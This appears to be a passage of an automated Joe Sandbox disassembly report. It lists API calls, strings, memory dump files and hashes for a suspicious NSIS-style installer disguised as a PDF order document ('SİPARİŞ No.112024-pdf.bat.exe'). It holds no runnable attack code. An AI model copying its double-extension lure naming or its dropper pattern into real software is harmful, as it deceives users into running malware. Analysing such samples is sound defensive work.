                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                  • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                  • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                  • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                  • wsprintfW.USER32 ref: 00404B52
                                                                  • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s$6B
                                                                  • API String ID: 3540041739-3884863406
                                                                  • Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                  • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                  • Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                  • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp$C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll
                                                                  • API String ID: 3109718747-70986989
                                                                  • Opcode ID: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                                                  • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                  • Opcode Fuzzy Hash: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                                                  • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                   • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FreeGlobal
                                                                  • String ID:
                                                                  • API String ID: 2979337801-0
                                                                  • Opcode ID: c4253058805baffdaa6720d6fcee7642606e222f3d2a8b55b4d1cd7272efe5db
                                                                  • Instruction ID: 401ed7753318b08e4f616b08a9082879aa566be760cbe75ae28eca02182daae3
                                                                  • Opcode Fuzzy Hash: c4253058805baffdaa6720d6fcee7642606e222f3d2a8b55b4d1cd7272efe5db
                                                                  • Instruction Fuzzy Hash: 4D518435D041D99A8B109FB8E5406EFBAB5EF46354F1D826BF430B7140D7B1BA8286A3
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID:
                                                                  • API String ID: 3808545654-0
                                                                  • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                  • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                  • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                  • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1639
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1640
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1654
                                                                  • GetProcAddress.KERNEL32(6FBC21F0,00000000), ref: 6FBC165B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC1664
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                   • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                  • String ID:
                                                                  • API String ID: 1148316912-0
                                                                  • Opcode ID: 1185ecaf1ddffb18dfa10a9f32312c18d0abfcd4a932434555fb547f88cb3dd2
                                                                  • Instruction ID: b184dca3b42f947398e06fcd1b3889a9e230ec1ec42e43ff1c3b289b345976b8
                                                                  • Opcode Fuzzy Hash: 1185ecaf1ddffb18dfa10a9f32312c18d0abfcd4a932434555fb547f88cb3dd2
                                                                  • Instruction Fuzzy Hash: EDF012731065387BDA2116A78C4DD9BBE9CDF8F2F5B160251F618D219085614C12D7F1
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                                                  • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                  • Opcode Fuzzy Hash: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                                                  • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                  • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                  • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                  • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-3081826266
                                                                  • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                  • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                                  • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                  • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                                  APIs
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Enum
                                                                  • String ID:
                                                                  • API String ID: 464197530-0
                                                                  • Opcode ID: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                                                  • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                  • Opcode Fuzzy Hash: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                                                  • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                  • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                  • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                  • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0040528F
                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                    • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                  • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                  • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                  • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                  APIs
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
                                                                  • RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll), ref: 004061A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID: Call
                                                                  • API String ID: 3356406503-1824292864
                                                                  • Opcode ID: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                                  • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                  • Opcode Fuzzy Hash: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                                  • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                  APIs
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                  • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                  Strings
                                                                  • Error launching installer, xrefs: 00405880
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                  • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                  • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                  • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                  • GlobalFree.KERNEL32(?), ref: 00403900
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-3081826266
                                                                  • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                  • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                  • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                  • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-224404859
                                                                  • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                  • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                  • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                  • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FBC116A
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC11C7
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC11D9
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC1203
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: f4b57fc440ab14c901d1c91339cc5f84c636162336d2534112105df77bec41ce
                                                                  • Instruction ID: e29740e0b0d246b7708236b72c4b99bb879a99ba026a0df3c060dfd5b6777852
                                                                  • Opcode Fuzzy Hash: f4b57fc440ab14c901d1c91339cc5f84c636162336d2534112105df77bec41ce
                                                                  • Instruction Fuzzy Hash: E831E7B6540641DFDB009F7AF945A6B77F8FB4AB20B09465AE840F7250E738E912C723
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                  • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
